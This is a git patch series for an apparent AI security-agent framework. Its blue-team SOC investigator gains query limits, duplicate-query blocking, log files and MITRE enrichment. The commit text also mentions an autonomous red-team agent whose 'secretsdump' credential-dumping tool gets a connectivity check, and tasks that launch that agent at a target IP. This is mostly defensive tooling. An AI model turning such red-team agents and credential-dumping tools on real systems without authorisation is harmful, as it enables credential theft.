- # Run the investigation with asyncio timeout (backup to signal timeout) + # Run the investigation with asyncio timeout (backup to watchdog) try: import asyncio @@ -313,30 +367,9 @@ def _timeout_handler(signum, frame): dn.log_metric("investigation_failed", 1) raise - except InvestigationTimeoutError: - logger.error(f"Investigation hit HARD TIMEOUT after {hard_timeout_seconds}s") - logger.error( - f"Current state: {len(state.evidence)} evidence items, " - f"{len(state.timeline)} timeline events" - ) - dn.log_metric("investigation_hard_timeout", 1) - - # Generate partial report - report_path = self._generate_report(state, None) - return { - "investigation_id": investigation_id, - "status": "hard_timeout", - "report_path": str(report_path), - "evidence_count": len(state.evidence), - "techniques_identified": list(state.identified_techniques), - "highest_pyramid_level": state.highest_pyramid_level, - } - finally: - # Always cancel the alarm and restore old handler - signal.alarm(0) - signal.signal(signal.SIGALRM, old_handler) - logger.debug("Hard timeout signal handler cleaned up") + # Always cancel the watchdog on normal completion + watchdog.cancel() def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" From 31633004d240a60c2ec6f31e419e2840a7050d15 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 16:12:37 -0700 Subject: [PATCH 3/5] feat: add robust log management, enforce query limits, and improve investigation flow **Added:** - Introduced /logs/ directory for agent log files and updated .gitignore to exclude it - Added log directory configuration and automatic log file creation for blue and red team tasks in Taskfile.yaml - Implemented Taskfile log management tasks: list, tail (latest/all/blue/red), and clean - Added log management usage docs to `docs/taskfile_usage.md` - Created timeline event from alert at investigation start for improved reporting - Added 
`reset_query_tracking()` and query counting utilities to blue_factory to enforce query and tool call limits per investigation - Wrapped Grafana MCP query tools with rate limiting and duplicate query detection - Added max queries/tool calls stop conditions to investigation agent - Blue `record_evidence()` tool now resolves and caches MITRE technique names/tactics - Red agent event logging now debounces rapid/duplicate events for cleaner logs - Red team `secretsdump` tool now includes SMB connectivity check, dc_ip param, and connection timeouts **Changed:** - Default max_steps for blue investigation agent lowered from 150 to 30 for tighter control - Updated all relevant blue and red team tasks to log to per-run logfiles in /logs/ - Blue team investigation flow now enforces strict query and tool call limits; agent is forced to complete if limits are hit - Blue `complete_investigation()` tool now auto-extracts recommendations from alert annotations if none provided, generates fallback synopsis from evidence, and logs more completion details - Enhanced evidence recording: technique metadata resolved and timeline event auto-added from alert - Initial alert prompt and system instructions templates now emphasize query limits, correct IOC extraction, and completion criteria; anti-patterns highlighted - Investigation docs and usage updated to clarify new stop conditions, log management, and completion requirements - Improved blue investigation docs and templates to stress the importance of IOC extraction, evidence recording, and attack synopsis requirements **Removed:** - Removed unused/obsolete warnings and manual validations from blue completion tool - Legacy query loop detection logic replaced by new global query/tool call limiters --- .gitignore | 1 + README.md | 26 +- Taskfile.yaml | 136 ++++++- docs/taskfile_usage.md | 19 +- src/ares/agents/blue/soc_investigator.py | 84 +++- src/ares/core/factories/blue_factory.py | 360 ++++++++++++++++-- 
src/ares/core/factories/red_factory.py | 95 ++++- src/ares/tools/blue/actions.py | 160 +++++--- src/ares/tools/blue/investigation.py | 26 ++ src/ares/tools/red/network.py | 50 ++- templates/agent/initial_alert_prompt.md.jinja | 34 +- templates/agent/system_instructions.md.jinja | 288 +++++++++++++- 12 files changed, 1122 insertions(+), 157 deletions(-) diff --git a/.gitignore b/.gitignore index 6450c881..0bef9302 100644 --- a/.gitignore +++ b/.gitignore @@ -6,6 +6,7 @@ test-alerts/ TODO .tool-versions /reports/ +/logs/ # Custom parquet storage *.parquet diff --git a/README.md b/README.md index cd924415..093cd982 100644 --- a/README.md +++ b/README.md @@ -171,7 +171,7 @@ uv run python -m ares \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ --args.poll-interval 30 \ - --args.max-steps 50 \ + --args.max-steps 30 \ --args.report-dir ./reports # Run once and exit (process current alerts only) @@ -186,7 +186,7 @@ Investigate a specific alert by providing it as JSON: uv run python -m ares investigate-alert test-alerts/example-alert.json \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ - --args.max-steps 15 + --args.max-steps 30 ``` #### Red Team - Penetration Testing @@ -222,7 +222,7 @@ task ares:red: TARGET=192.168.1.100 # Or via CLI uv run python -m ares red-team 192.168.1.100 \ --args.model claude-sonnet-4-20250514 \ - --args.max-steps 50 \ + --args.max-steps 30 \ --args.report-dir ./reports ``` @@ -239,15 +239,27 @@ bloodhound-python). 
| `--args.model` | `claude-sonnet-4-20250514` | LLM model to use | | `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP | | `--args.poll-interval` | `30` | Seconds between alert polls | -| `--args.max-steps` | `50` | Maximum agent steps per investigation | +| `--args.max-steps` | `30` | Maximum LLM round trips per investigation | | `--args.report-dir` | `./reports` | Directory for markdown reports | | `--args.once` | `false` | Process current alerts once and exit | +**Stop Conditions:** + +The agent stops when **any** of these conditions are met: + +- `complete_investigation()` tool is called (normal completion) +- `escalate_investigation()` tool is called (escalation to human) +- 5 Loki/Prometheus queries executed +- 20 total tool calls made (prevents infinite loops) +- `max_steps` LLM round trips reached + **Timeout Behavior:** -The agent timeout is `max_steps × 60 seconds` (1 minute per step). When using -Taskfile, one-shot modes (`ares:blue:once:`, `ares:investigate`) default to 15 -steps (~15 min), while polling modes default to 50 steps (~50 min per alert). 
+The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded +- When using Taskfile, defaults are 15 steps (once mode) or 50 steps (polling mode) **Dreadnode Platform Arguments (`--dn-args.*`):** diff --git a/Taskfile.yaml b/Taskfile.yaml index 958be2ff..bdfc31a2 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -18,6 +18,7 @@ vars: MAX_STEPS: '{{.MAX_STEPS | default "50"}}' MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}' + LOG_DIR: '{{.LOG_DIR | default "./logs"}}' DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}' DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE | default "ares-protocol"}}' @@ -161,6 +162,10 @@ tasks: export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -171,7 +176,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:once: desc: Run blue team agent once and exit (uses 1Password for API keys) @@ -186,6 +192,10 @@ tasks: export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + 
LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -197,7 +207,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local: desc: Run blue team agent using .env file (no 1Password) @@ -217,6 +228,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -226,7 +241,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local:once: desc: Run blue team agent once and exit using .env file (no 1Password) @@ -246,6 +262,10 @@ tasks: . 
./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -256,7 +276,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:investigate: desc: "Investigate a specific alert from JSON file (usage: task ares:investigate ALERT=alert.json)" @@ -409,6 +430,99 @@ tasks: echo "✅ Reports cleaned" fi + # =========================================================================== + # Ares Local Log Management + # =========================================================================== + + ares:logs:list: + desc: List all local agent logs + cmds: + - | + echo "Agent Logs:" + echo "===========" + if [ -d {{.LOG_DIR}} ]; then + ls -lht {{.LOG_DIR}}/*.log 2>/dev/null || echo "No logs found" + else + echo "Log directory not found: {{.LOG_DIR}}" + fi + + ares:logs:tail: + desc: "Tail the latest log file (usage: task ares:logs:tail [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Log file: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:blue: + desc: "Tail the latest blue team log (usage: task ares:logs:blue [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/blue-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; 
then + echo "No blue team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Blue team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:red: + desc: "Tail the latest red team log (usage: task ares:logs:red [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/red-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No red team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Red team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:clean: + desc: Remove all local agent logs + cmds: + - | + read -p "Delete all logs in {{.LOG_DIR}}? (y/N) " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + rm -rf {{.LOG_DIR}}/*.log + echo "✅ Logs cleaned" + fi + ares:version: desc: Show Ares version information cmds: @@ -522,6 +636,10 @@ tasks: echo "✅ Resolved to: $RESOLVED_TARGET" fi + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team "$RESOLVED_TARGET" \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -530,7 +648,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:local: desc: "Run red team agent using .env file (usage: task ares:red:local TARGET=192.168.1.100)" @@ -551,6 +670,10 @@ tasks: . 
./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team {{.TARGET}} \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -558,7 +681,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:logs: desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])" diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md index ba7b502c..1b7d53f3 100644 --- a/docs/taskfile_usage.md +++ b/docs/taskfile_usage.md @@ -304,17 +304,30 @@ All tasks support the following configuration variables: | `MODEL` | `claude-sonnet-4-20250514` | LLM model to use | | `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts | | `POLL_INTERVAL` | `30` | Seconds between alert polls | -| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (~50 min timeout) | -| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes (~15 min timeout) | +| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (Taskfile override, code default is 30) | +| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes | | `REPORT_DIR` | `./reports` | Directory for markdown reports | | `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL | | `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name | | `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name | | `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name | +**Stop Conditions:** + +The agent will stop when **any** of these conditions are met: + +- Agent calls `complete_investigation()` (normal completion) +- Agent calls `escalate_investigation()` (escalation to human) 
+- 5 Loki/Prometheus queries executed +- **20 total tool calls made** (prevents infinite loops) +- `max_steps` LLM round trips reached + **Timeout Behavior:** -The agent timeout is calculated as `max_steps × 60 seconds` (1 minute per step): +The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded | Mode | Default Steps | Max Timeout | | --- | --- | --- | diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index e20f5f80..c528cc52 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -13,8 +13,8 @@ import dreadnode as dn from loguru import logger -from ares.core.factories.blue_factory import create_investigation_agent -from ares.core.models import InvestigationState +from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking +from ares.core.models import InvestigationState, TimelineEvent from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient @@ -159,7 +159,7 @@ def __init__( grafana_api_key: str, mitre_client: MITREAttackClient, report_dir: Path, - max_steps: int = 150, + max_steps: int = 30, ): self.model = model self.grafana_url = grafana_url @@ -244,6 +244,9 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") + # Reset query tracking for this investigation + reset_query_tracking() + # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, @@ -270,14 +273,33 @@ async def investigate(self, alert: dict) -> dict: annotations = alert.get("annotations", {}) for key in ["mitre_technique", "mitre", "technique_id", "technique"]: if labels.get(key): - state.identified_techniques.add(labels[key]) - logger.info(f"Auto-recorded MITRE 
technique from alert: {labels[key]}") + tech_id = labels[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break if annotations.get(key): - state.identified_techniques.add(annotations[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") + tech_id = annotations[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break + # Create initial timeline event from alert + self._create_alert_timeline_event(state, alert) + initial_prompt = build_initial_prompt(alert) with dn.run(tags=["soc-investigation", alert_name]): @@ -371,6 +393,54 @@ async def investigate(self, alert: dict) -> dict: # Always cancel the watchdog on normal completion watchdog.cancel() + def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) -> None: + """Create an initial timeline event from the alert.""" + labels = alert.get("labels", {}) + annotations = alert.get("annotations", {}) + + # Parse alert timestamp + starts_at = alert.get("startsAt", "") + try: + if starts_at: + alert_time = datetime.fromisoformat(starts_at.replace("Z", "+00:00")) + else: + alert_time = datetime.now(timezone.utc) + except ValueError: + alert_time = datetime.now(timezone.utc) + + # Build description from alert + alert_name = labels.get("alertname", 
"Unknown Alert") + severity = labels.get("severity", "unknown") + summary = annotations.get("summary", annotations.get("description", "")) + + description = f"{severity.upper()} alert triggered: {alert_name}" + if summary: + description += f" - {summary[:100]}" + + # Get MITRE technique from alert + mitre_techniques = [] + for key in ["mitre_technique", "mitre", "technique_id"]: + if labels.get(key): + mitre_techniques.append(labels[key]) + break + if annotations.get(key): + mitre_techniques.append(annotations[key]) + break + + # Create timeline event + event = TimelineEvent( + id="tl-alert-0000", + timestamp=alert_time, + description=description, + evidence_ids=[], + mitre_techniques=mitre_techniques, + confidence=0.9, + source="alert", + ) + + state.timeline.append(event) + logger.info(f"Created initial timeline event from alert: {description[:50]}...") + def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" from ares.reports.investigation import MarkdownReportGenerator diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index 5cc06de2..cf96a4b8 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -1,10 +1,13 @@ """Factory for creating investigation agents with presets.""" +import functools +from typing import Any + import dreadnode as dn from dreadnode.agent import Agent -from dreadnode.agent.events import AgentStalled, ToolEnd, ToolStart +from dreadnode.agent.events import AgentEvent, AgentStalled, ToolEnd, ToolStart from dreadnode.agent.hooks import retry_with_feedback -from dreadnode.agent.stop import tool_use +from dreadnode.agent.stop import StopCondition, tool_use from dreadnode.agent.thread import Thread from loguru import logger @@ -24,62 +27,339 @@ # Load system instructions from template SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja") -# Track consecutive 
query calls without workflow progress -_consecutive_queries = [] +# Track query calls - reset per investigation via reset_query_tracking() +_total_queries = 0 +_consecutive_queries: list[str] = [] +_query_limit_hit = False +_executed_queries: list[dict] = [] +_seen_queries: dict[str, int] = {} # Track query -> count to detect loops +_current_state: "InvestigationState | None" = None +MAX_QUERIES_PER_INVESTIGATION = 5 +MAX_QUERIES_CRITICAL = 8 # Higher limit for critical alerts +MAX_DUPLICATE_QUERIES = 2 # Max times same query can run before blocking + + +def reset_query_tracking(): + """Reset query tracking for a new investigation.""" + global \ + _total_queries, \ + _consecutive_queries, \ + _query_limit_hit, \ + _executed_queries, \ + _seen_queries, \ + _current_state + _total_queries = 0 + _consecutive_queries = [] + _query_limit_hit = False + _executed_queries = [] + _seen_queries = {} + _current_state = None + + +def set_investigation_state(state: "InvestigationState"): + """Set the current investigation state for query recording.""" + global _current_state + _current_state = state + + +def _get_query_limit() -> int: + """Get the query limit based on alert severity.""" + if _current_state: + severity = _current_state.alert.get("labels", {}).get("severity", "").lower() + if severity == "critical": + return MAX_QUERIES_CRITICAL + return MAX_QUERIES_PER_INVESTIGATION + + +def _check_query_limit() -> str | None: + """Check if query limit is reached. Returns error message if limit hit, None otherwise.""" + global _query_limit_hit + limit = _get_query_limit() + if _query_limit_hit or _total_queries >= limit: + _query_limit_hit = True + return ( + f"🛑 QUERY LIMIT REACHED ({_total_queries}/{limit}). 
You have exceeded the maximum number of queries.\n\n" + "You MUST call complete_investigation(summary='...', attack_synopsis='...', recommendations=[...]) NOW.\n\n" + "Summarize what you found from previous queries and complete the investigation.\n" + "Do NOT attempt any more queries - they will all be blocked.\n\n" + "REMEMBER: Include attack_synopsis (narrative of what happened) and recommendations (list of actions).\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated [alert name]. Found [evidence/no evidence]. Confidence: [level].',\n" + " attack_synopsis='At [time], [user/IP] performed [action] against [target]...',\n" + " recommendations=['Reset compromised passwords', 'Block source IP', ...]\n" + ")" + ) + return None + + +def _check_duplicate_query(query: str) -> str | None: + """Check if query is a duplicate. Returns error message if duplicate limit hit.""" + # Normalize query for comparison (strip whitespace, lowercase) + normalized = query.strip().lower() + + count = _seen_queries.get(normalized, 0) + if count >= MAX_DUPLICATE_QUERIES: + logger.warning(f"🔁 Duplicate query blocked (run {count + 1} times): {query[:100]}...") + return ( + f"🔁 DUPLICATE QUERY BLOCKED. You've already run this query {count} times.\n\n" + "**DO NOT re-run the same query.** Instead:\n\n" + "1. **PARSE THE RESULTS** you already received\n" + "2. **EXTRACT IOCs** from the JSON:\n" + " - Look for 'computer' field → record as hostname\n" + " - Look for 'TargetUserName' in event_data → record as user\n" + " - Look for 'IpAddress' in event_data → record as IP\n" + "3. **CALL record_evidence()** for each IOC found\n" + "4. 
**Then try a DIFFERENT query** or call complete_investigation()\n\n" + "Example extraction from previous results:\n" + "```\n" + "record_evidence(evidence_type='hostname', value='winterfell.north.sevenkingdoms.local', ...)\n" + "record_evidence(evidence_type='user', value='robb.stark', ...)\n" + "```" + ) + + # Increment count + _seen_queries[normalized] = count + 1 + return None + + +def _increment_query_count(tool_name: str): + """Increment query counter and log.""" + global _total_queries + _total_queries += 1 + _consecutive_queries.append(tool_name) + if len(_consecutive_queries) > 5: + _consecutive_queries.pop(0) + limit = _get_query_limit() + logger.info(f"📊 Query count: {_total_queries}/{limit}") + + +def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None): + """Record a query to the investigation state.""" + from datetime import datetime, timezone + + query_record = { + "type": tool_name, + "query": kwargs.get("logql") or kwargs.get("expr") or str(kwargs), + "timestamp": datetime.now(timezone.utc).isoformat(), + "result_count": result_count, + "datasource": kwargs.get("datasourceUid", "unknown"), + } + _executed_queries.append(query_record) + + # Also add to investigation state if available + if _current_state: + _current_state.executed_queries.append(query_record) + + +def create_rate_limited_mcp_tool(original_tool: Any) -> Any: + """ + Wrap an MCP tool with rate limiting. + + The wrapper checks the global query counter BEFORE executing. + If limit is reached, returns an error message instead of executing. + This ensures the LLM sees the limit message even when batching queries. 
+ """ + # Get the tool name for checking if it's a query tool + tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "") + + # Only wrap query tools + if "query_loki" not in tool_name and "query_prometheus" not in tool_name: + return original_tool + + logger.debug(f"Wrapping MCP tool with rate limiting: {tool_name}") + + # Get the original function to wrap + original_fn = getattr(original_tool, "fn", None) + if original_fn is None and callable(original_tool): + original_fn = original_tool + + if original_fn is None: + logger.warning(f"Could not find callable for tool {tool_name}, not wrapping") + return original_tool + + @functools.wraps(original_fn) + async def rate_limited_wrapper(*args, **kwargs): + # Check limit BEFORE executing + error_msg = _check_query_limit() + if error_msg: + logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached") + return error_msg + + # Check for duplicate query + query_str = kwargs.get("logql") or kwargs.get("expr") or "" + if query_str: + dup_msg = _check_duplicate_query(query_str) + if dup_msg: + logger.warning(f"🔁 Blocking duplicate query: {query_str[:50]}...") + return dup_msg + + # Increment counter + _increment_query_count(tool_name) + + # Execute original + try: + result = await original_fn(*args, **kwargs) + # Record the query with result count + result_count = None + if isinstance(result, list): + result_count = len(result) + elif isinstance(result, dict) and "results" in result: + result_count = len(result.get("results", [])) + elif isinstance(result, str): + # Try to estimate result count from string response + result_count = result.count("\n") if result else 0 + _record_query(tool_name, kwargs, result_count) + return result + except Exception as e: + error_str = str(e) + # Handle gRPC timeout from mcp-grafana (10s default timeout) + if "grpc" in error_str.lower() and "connection is closing" in error_str: + logger.warning(f"Query tool {tool_name} timed out (mcp-grafana 10s 
limit)") + _record_query(tool_name, kwargs, result_count=0) + return { + "error": "Query timed out due to mcp-grafana 10s limit. " + "Try a shorter time range (e.g., last 1 hour instead of 24 hours) " + "or add more specific label filters to reduce the query scope." + } + logger.error(f"Query tool {tool_name} failed: {e}") + # Record failed query + _record_query(tool_name, kwargs, result_count=0) + raise + + # Create a new tool with the wrapped function + # Try to preserve the tool structure for dreadnode SDK + if hasattr(original_tool, "fn"): + # It's a Tool object with a .fn attribute + original_tool.fn = rate_limited_wrapper + return original_tool + # It's a callable, just return the wrapper + rate_limited_wrapper.__name__ = tool_name + return rate_limited_wrapper + + +def wrap_mcp_query_tools(mcp_tools: list) -> list: + """ + Wrap all query-related MCP tools with rate limiting. + + Args: + mcp_tools: List of MCP tools from Grafana MCPClient + + Returns: + List of tools with query tools wrapped for rate limiting + """ + wrapped = [] + wrapped_count = 0 + + for tool in mcp_tools: + tool_name = getattr(tool, "name", "") or getattr(tool, "__name__", str(tool)) + + if "query_loki" in tool_name or "query_prometheus" in tool_name: + wrapped_tool = create_rate_limited_mcp_tool(tool) + wrapped.append(wrapped_tool) + wrapped_count += 1 + logger.info(f"✅ Wrapped query tool: {tool_name}") + else: + wrapped.append(tool) + + logger.info(f"Wrapped {wrapped_count} query tools with rate limiting") + return wrapped async def log_tool_usage(event: ToolStart): - """Log tool calls for observability and detect loops.""" + """Log tool calls for observability.""" + # Note: Query counting is now handled by the rate-limited wrapper (create_rate_limited_mcp_tool) + # This hook only handles logging and metrics if hasattr(event, "tool_call") and event.tool_call: tool_name = event.tool_call.name logger.info(f"🔧 Tool call: {tool_name}") dn.log_metric(f"tool_{tool_name}", 1, mode="count") - # 
Track if agent is stuck in query loop - if "query_loki" in tool_name or "query_prometheus" in tool_name: - _consecutive_queries.append(tool_name) - # Keep only last 5 calls - if len(_consecutive_queries) > 5: - _consecutive_queries.pop(0) - - # If last 3 calls are all queries, warn - if len(_consecutive_queries) >= 3 and all( - "query_loki" in t or "query_prometheus" in t for t in _consecutive_queries[-3:] - ): - logger.warning( - "⚠️ DETECTED QUERY LOOP: 3+ consecutive queries without recording evidence" - ) - logger.warning( - "Agent should call record_evidence() or get_combined_questions() next" - ) - elif "record_evidence" in tool_name or "get_combined_questions" in tool_name: - # Reset counter when workflow tools are called + # Clear consecutive queries on completion + if "complete_investigation" in tool_name or "escalate_investigation" in tool_name: _consecutive_queries.clear() async def log_tool_result(event: ToolEnd): - """Log tool results.""" + """Log tool results for observability.""" + # Note: Query limit enforcement is now handled by the rate-limited wrapper + # The wrapper returns an error message BEFORE execution, so the LLM sees it if hasattr(event, "tool_call") and event.tool_call: + tool_name = event.tool_call.name if hasattr(event, "error") and event.error: - logger.warning(f"❌ Tool {event.tool_call.name} failed: {event.error}") + logger.warning(f"❌ Tool {tool_name} failed: {event.error}") dn.log_metric("tool_errors", 1, mode="count") else: - logger.info(f"✅ Tool {event.tool_call.name} completed") + logger.info(f"✅ Tool {tool_name} completed") unstall_hook = retry_with_feedback( event_type=AgentStalled, feedback=( - "You seem stuck. Remember:\n" - "1. Call get_combined_questions() to get next questions\n" - "2. Execute queries in PARALLEL to answer those questions\n" - "3. Record evidence with record_evidence() for EVERY finding\n" - "4. 
When done, call complete_investigation() or escalate_investigation()\n\n" - "If queries return empty results, document that and try broader queries OR move forward." + "🛑 YOU ARE STUCK. You MUST call complete_investigation() NOW with ALL parameters.\n\n" + "Required parameters:\n" + "1. summary: What you found (or 'No malicious activity confirmed' if nothing)\n" + "2. attack_synopsis: Narrative of what happened chronologically\n" + "3. recommendations: List of actions to take (check alert annotations for 'response' guidance)\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated DCSync alert. No matching events in time window. Confidence: Low.',\n" + " attack_synopsis='Alert triggered at [time] for potential DCSync activity. " + "Investigation found no corroborating evidence in Loki logs.',\n" + " recommendations=['Continue monitoring for Event 4662', 'Review DC access logs manually']\n" + ")\n\n" + "DO NOT make more queries. Call complete_investigation() NOW." ), ) +def max_queries_stop(max_queries: int = 5) -> StopCondition: + """Stop condition that fires after max_queries Loki/Prometheus queries.""" + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + query_count = sum( + 1 